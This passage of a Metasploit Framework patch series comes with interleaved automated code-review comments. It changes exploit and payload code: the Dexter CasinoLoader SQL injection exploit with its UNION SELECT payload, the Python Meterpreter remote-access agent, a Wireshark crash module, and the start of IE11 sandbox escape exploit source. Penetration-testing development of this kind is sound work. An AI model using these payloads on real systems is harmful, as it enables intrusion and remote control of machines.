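Review bot: In `execute`, the local hash named `payload` shadows the framework's `payload` accessor that `java_payload` reads in the same class, which makes the request builder easy to misread; naming it `body` (with `'data' => JSON.generate(body)`) keeps the two apart. `parse_result` ends in a bare `rescue` that hides any unexpected error while walking the response, and `rescue NoMethodError, TypeError` would be tighter. The header comment reads `http//metasploit.com/download` and is missing the colon. For readers on the defending side, the description would be more useful if it named the remediation it alludes to: upgrading to 1.2.0 or later, or setting `script.disable_dynamic: true` on older nodes.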
diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index c777d21b92..01c6c48a57 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 - to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an - incomplete packet. + This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well + as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a + packet correctly when an incorrect length is given. }, 'License' => MSF_LICENSE, 'Author' => From c89cd24621fff1a7473c65ef387c8f960a6f7024 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Wed, 28 May 2014 13:31:00 -0500 Subject: [PATCH 397/853] Rewire some snmp modules to use print_error instead of print_status. --- modules/auxiliary/scanner/snmp/snmp_enum.rb | 10 +++++----- .../auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb | 8 ++++---- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 10019cf58d..595c6dd28c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb 
@@ -946,17 +946,17 @@ class Metasploit3 < Msf::Auxiliary rescue SNMP::RequestTimeout - vprint_status("#{ip} SNMP request timeout.") + print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError - print_status("#{ip} Connection refused.") + print_error("#{ip} Connection refused.") rescue SNMP::InvalidIpAddress - print_status("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.") + print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.") rescue SNMP::UnsupportedVersion - print_status("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") + print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e - print_status("Unknown error: #{e.class} #{e}") + print_error("Unknown error: #{e.class} #{e}") elog("Unknown error: #{e.class} #{e}") elog("Call stack:\n#{e.backtrace.join "\n"}") ensure diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index bacfdd15b7..be8dc52a9c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -136,15 +136,15 @@ class Metasploit3 < Msf::Auxiliary disconnect_snmp rescue SNMP::RequestTimeout - vprint_status("#{ip}, SNMP request timeout.") + print_error("#{ip}, SNMP request timeout.") rescue Errno::ECONNREFUSED - vprint_status("#{ip}, Connection refused.") + print_error("#{ip}, Connection refused.") rescue SNMP::InvalidIpAddress - vprint_status("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.") + print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.") rescue ::Interrupt raise $! rescue ::Exception => e - vprint_error("#{ip}, Unknown error: #{e.class} #{e}") + print_error("#{ip}, Unknown error: #{e.class} #{e}") end end end From 15b1c79039dcb2cc1a12206d35be0ad2360da300 Mon Sep 17 00:00:00 2001 
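Review bot: The switch from `vprint_status` to `print_error` on `SNMP::RequestTimeout` changes verbosity as well as severity. A request timeout is the normal outcome for most addresses in a range scan, so every silent host now prints an error line even when VERBOSE is off. `vprint_error("#{ip} SNMP request timeout.")` would keep the error colouring without the noise. The same applies to the timeout, connection-refused and invalid-address branches in the snmp_enum_hp_laserjet.rb hunk that follows, which were all verbose-only before. In both files the `rescue` chain belongs to a method that begins outside the hunk.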
From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Wed, 28 May 2014 16:30:27 -0400 Subject: [PATCH 398/853] Adjust whitespace and set bytes to str for Python 2 --- data/meterpreter/meterpreter.py | 7 +++++-- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- modules/payloads/stages/python/meterpreter.rb | 3 ++- 4 files changed, 9 insertions(+), 5 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 979ebb4107..058a6c9215 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -16,6 +16,9 @@ import subprocess import sys import threading +if sys.version_info[0] < 3: + bytes = str + # # Constants # @@ -286,7 +289,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = '' + request = bytes() while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -487,7 +490,7 @@ class PythonMeterpreter(object): try: #print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) - except Exception, err: + except Exception: #print("[-] method {0} resulted in an error".format(handler_name)) result = ERROR_FAILURE else: diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 50e8974123..356a3fcfbf 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -22,7 +22,7 @@ module Metasploit3 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::BindTcp, 'Stager' => {'Payload' => ""} - )) + )) end # diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 4f741f0c52..5f4e0cf92e 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb 
@@ -22,7 +22,7 @@ module Metasploit3 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => {'Payload' => ""} - )) + )) end # diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 63fce13671..6c497f080c 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -20,7 +20,8 @@ module Metasploit3 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_Python_Python)) + 'Session' => Msf::Sessions::Meterpreter_Python_Python + )) end def generate_stage From 8a2236ecbbc5275671f1253d04551fe017bd7dbb Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 29 May 2014 04:42:49 -0500 Subject: [PATCH 399/853] Fix the last of the Set-Cookie msftidy warnings --- modules/auxiliary/crawler/msfcrawler.rb | 5 ----- modules/auxiliary/scanner/http/crawler.rb | 4 ++-- .../exploits/multi/http/dexter_casinoloader_exec.rb | 10 +++++----- 3 files changed, 7 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index fbd7ec2175..27c3e2e3e4 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -258,11 +258,6 @@ class Metasploit3 < Msf::Auxiliary # In case modules or crawler calls to_s on de-chunked responses # resp.transfer_chunked = false - if resp['Set-Cookie'] - #puts "Set Cookie: #{resp['Set-Cookie']}" - #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}" - #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] - end if datastore['StoreDB'] storedb(reqopts,resp,$dbpathmsf) diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 344cf57458..0915ee3da3 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb 
@@ -104,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary info[:ctype] = page.headers['content-type'] end - if page.headers['set-cookie'] - info[:cookie] = page.headers['set-cookie'] + if !page.get_cookies.empty? + info[:cookie] = page.get_cookies end if page.headers['authorization'] diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 9e4e795987..f7844589e7 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -79,8 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote 'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --") } }) - if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') - return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3] + if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') + return Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1]))[1..-3] end return false end @@ -96,8 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and - Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false + if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') and + Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe @@ -167,4 +167,4 @@ class Metasploit3 < Msf::Exploit::Remote return end end -end \ No newline at end of file +end 
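Review bot: In the crawler.rb hunk `page.get_cookies` is called twice, and the value stored in `info[:cookie]` is no longer the raw `Set-Cookie` header. If `get_cookies` returns only the parsed name/value pairs (worth confirming against its definition, which this patch does not show), attributes such as `Secure`, `HttpOnly` and `path` are dropped from the stored record, and those are the fields someone auditing the crawl results would look for. Reading it once, `cookies = page.get_cookies` then `info[:cookie] = cookies unless cookies.empty?`, fixes the first point; keeping `page.headers['set-cookie']` as the stored value would address the second. The surrounding method starts and ends outside the hunk.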
From aa85cb8195819a4f41604931c22dbc659066da21 Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Thu, 29 May 2014 05:46:32 -0500 Subject: [PATCH 400/853] Update powershell.rb --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 867772db1b..b77da4a5e3 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -19,7 +19,7 @@ module Powershell # Returns true if powershell is installed # def have_powershell? - cmd_out = cmd_exec("cmd.exe /c echo. | powershell get-host") + cmd_out = cmd_exec('cmd.exe /c "echo. | powershell get-host"') return true if cmd_out =~ /Name.*Version.*InstanceId/m return false end From 145776db4d3fa4b4b2c838efe4da131f298c57c5 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 10:52:49 -0400 Subject: [PATCH 401/853] Add a DEBUGGING option to the python meterpreter --- data/meterpreter/meterpreter.py | 100 ++++++++++-------- modules/payloads/stages/python/meterpreter.rb | 8 ++ 2 files changed, 62 insertions(+), 46 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 058a6c9215..f80318e13d 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,12 +1,5 @@ #!/usr/bin/python import code -try: - import ctypes -except: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - import os import random import select 
@@ -15,13 +8,29 @@ import struct import subprocess import sys import threading +import traceback + +try: + import ctypes +except ImportError: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') if sys.version_info[0] < 3: - bytes = str + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # +DEBUGGING = False + PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -103,6 +112,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} +EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -128,25 +138,6 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') -@export -def packet_get_tlv(pkt, tlv_type): - offset = 0 - while (offset < len(pkt)): - tlv = struct.unpack('>II', pkt[offset:offset+8]) - if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: - val = pkt[offset+8:(offset+8+(tlv[0] - 8))] - if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] - elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: - val = struct.unpack('>I', val)[0] - elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - val = bool(struct.unpack('b', val)[0]) - elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - pass - return {'type':tlv[1], 'length':tlv[0], 'value':val} - offset += tlv[0] - return {} - @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 
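Review bot: On the Python 3 branch, `str = lambda x: __builtins__['str'](x, 'UTF-8')` subscripts `__builtins__`, which CPython only makes a dict inside imported or exec'd code; in a file run as `__main__` it is the builtins module and the subscript raises `TypeError`. Since the file keeps its `#!/usr/bin/python` line, that path looks reachable. Capturing the original before rebinding, `_str = str` followed by `str = lambda x: _str(x, 'UTF-8')`, avoids the lookup altogether. A short comment above the block stating that `bytes` and `str` are rebound module-wide would also help, because every later `str(...)` call in the file now decodes rather than converts.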
@@ -155,7 +146,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] + val = val.split(NULL_BYTE, 1)[0] elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -166,6 +157,14 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() +@export +def packet_get_tlv(pkt, tlv_type): + try: + tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] + except IndexError: + return {} + return tlv + @export def tlv_pack(*args): if len(args) == 2: 
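Review bot: The new `packet_get_tlv` builds the full list of matching TLVs only to take element 0. If Python 2.5 does not have to be supported, `return next(packet_enum_tlvs(pkt, tlv_type), {})` gives the first match or `{}` without the list or the `try`/`except IndexError`. Separately, the generator it now depends on ends with `raise StopIteration()` (the context line just above the added function). Python 3.7 and later turn that into `RuntimeError` under PEP 479, which `except IndexError` will not catch, so a plain `return` is the portable way to end the generator. `packet_enum_tlvs` begins outside this hunk.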
@@ -173,18 +172,22 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' - elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') + else: + value = tlv['value'] + if not is_bytes(value): + value = bytes(value, 'UTF-8') + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data #@export 
@@ -254,7 +257,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in filter(lambda x: x.startswith('_core'), dir(self)): + for func in list(filter(lambda x: x.startswith('_core'), dir(self))): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -360,13 +363,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = self.extension_functions.keys() + preloadlib_methods = list(self.extension_functions.keys()) symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = self.extension_functions.keys() - new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) + postloadlib_methods = list(self.extension_functions.keys()) + new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response 
@@ -484,17 +487,22 @@ class PythonMeterpreter(object): reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) resp += tlv_pack(reqid_tlv) - handler_name = method_tlv['value'] + handler_name = str(method_tlv['value']) if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - #print("[*] running method {0}".format(handler_name)) + if DEBUGGING: + print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) except Exception: - #print("[-] method {0} resulted in an error".format(handler_name)) + if DEBUGGING: + print("[-] method {0} resulted in an error".format(handler_name)) + exc_type, exc_value, exc_traceback = sys.exc_info() + traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) result = ERROR_FAILURE else: - #print("[-] method {0} was requested but does not exist".format(handler_name)) + if DEBUGGING: + print("[-] method {0} was requested but does not exist".format(handler_name)) result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 6c497f080c..cb5b286c0b 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -22,6 +22,9 @@ module Metasploit3 'License' => MSF_LICENSE, 'Session' => Msf::Sessions::Meterpreter_Python_Python )) + register_advanced_options([ + OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ]) + ], self.class) end def generate_stage @@ -30,6 +33,11 @@ module Metasploit3 met = File.open(file, "rb") {|f| f.read(f.stat.size) } + + if datastore['DEBUGGING'] + met = met.sub("DEBUGGING = False", "DEBUGGING = True") + end + met end end From 75777cb3f900f9d4f673183275dbc2fad3ac886f Mon Sep 17 00:00:00 2001 
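Review bot: `met.sub("DEBUGGING = False", "DEBUGGING = True")` in `generate_stage` depends on that exact text being present in meterpreter.py; if the assignment is ever reformatted, the option silently does nothing. `sub!` returns nil when nothing matched, so `raise 'DEBUGGING marker not found in meterpreter.py' unless met.sub!("DEBUGGING = False", "DEBUGGING = True")` would surface the drift. The option description could also say that the debug output is written by the Python process itself (its stdout and stderr, per the `print` and `traceback.print_exception` calls in the same commit), not to the framework console. `generate_stage` begins above the hunk.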
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 11:38:43 -0500 Subject: [PATCH 402/853] Add IE11SandboxEscapes source --- LICENSE | 4 + .../CVE-2013-5045/CVE-2013-5045.cpp | 184 +++++ .../CVE-2013-5045/CVE-2013-5045.vcxproj | 188 +++++ .../CVE-2013-5045/dllmain.cpp | 23 + .../CVE-2013-5045/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2013-5045/stdafx.h | 11 + .../CVE-2013-5045/targetver.h | 8 + .../CVE-2013-5046/CVE-2013-5046.cpp | 127 ++++ .../CVE-2013-5046/CVE-2013-5046.vcxproj | 182 +++++ .../CVE-2013-5046/dllmain.cpp | 23 + .../CVE-2013-5046/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2013-5046/stdafx.h | 12 + .../CVE-2013-5046/targetver.h | 8 + .../CVE-2014-0257/CVE-2014-0257.cpp | 201 ++++++ .../CVE-2014-0257/CVE-2014-0257.vcxproj | 182 +++++ .../CVE-2014-0257/dllmain.cpp | 23 + .../CVE-2014-0257/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2014-0257/stdafx.h | 11 + .../CVE-2014-0257/targetver.h | 8 + .../CVE-2014-0268/CVE-2014-0268.cpp | 81 +++ .../CVE-2014-0268/CVE-2014-0268.vcxproj | 183 +++++ .../CVE-2014-0268/dllmain.cpp | 23 + .../CVE-2014-0268/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2014-0268/stdafx.h | 11 + .../CVE-2014-0268/targetver.h | 8 + .../CommonUtils/CommonUtils.vcxproj | 154 ++++ .../IE11SandboxEscapes/CommonUtils/Utils.cpp | 373 ++++++++++ .../IE11SandboxEscapes/CommonUtils/Utils.h | 21 + .../CommonUtils/interfaces.h | 258 +++++++ .../IE11SandboxEscapes/CommonUtils/regln.cpp | 161 +++++ .../IE11SandboxEscapes/CommonUtils/regln.h | 70 ++ .../IE11SandboxEscapes/CommonUtils/stdafx.cpp | 8 + .../IE11SandboxEscapes/CommonUtils/stdafx.h | 15 + .../CommonUtils/targetver.h | 8 + .../IE11SandboxEscapes/IE11SandboxEscapes.sln | 72 ++ .../InjectDll/InjectDll.cpp | 107 +++ .../InjectDll/InjectDll.vcxproj | 155 ++++ .../IE11SandboxEscapes/InjectDll/stdafx.cpp | 8 + .../IE11SandboxEscapes/InjectDll/stdafx.h | 12 + .../IE11SandboxEscapes/InjectDll/targetver.h | 8 + .../exploits/IE11SandboxEscapes/LICENSE | 674 ++++++++++++++++++ 
.../exploits/IE11SandboxEscapes/README.md | 10 + 42 files changed, 3647 insertions(+) create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj create mode 100755 
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/LICENSE create mode 100755 external/source/exploits/IE11SandboxEscapes/README.md diff --git a/LICENSE b/LICENSE index ea38924130..e16ad8f0a2 100644 --- a/LICENSE +++ b/LICENSE 
@@ -36,6 +36,10 @@ Files: external/ruby-lorcon/* Copyright: 2005, dragorn and Joshua Wright License: LGPL-2.1 +Files: external/source/exploits/IE11SandboxEscapes/* +Copyright: James Forshaw, 2014 +License: GPLv3 + Files: external/source/byakugan/* Copyright: Lurene Grenier, 2009 License: BSD-3-clause diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp new file mode 100755 index 0000000000..52d366faf8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp 
@@ -0,0 +1,184 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <winternl.h> +#include <IEPMapi.h> + +#define MAX_ENV 32767 + +#pragma comment(lib, "Iepmapi.lib") + +typedef NTSTATUS (__stdcall *fNtOpenSection)( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline) +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + + if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, + &startInfo, &procInfo)) + { + DebugPrintf("Error Creating Process: %d", GetLastError()); + + return nullptr; + } + else + { + 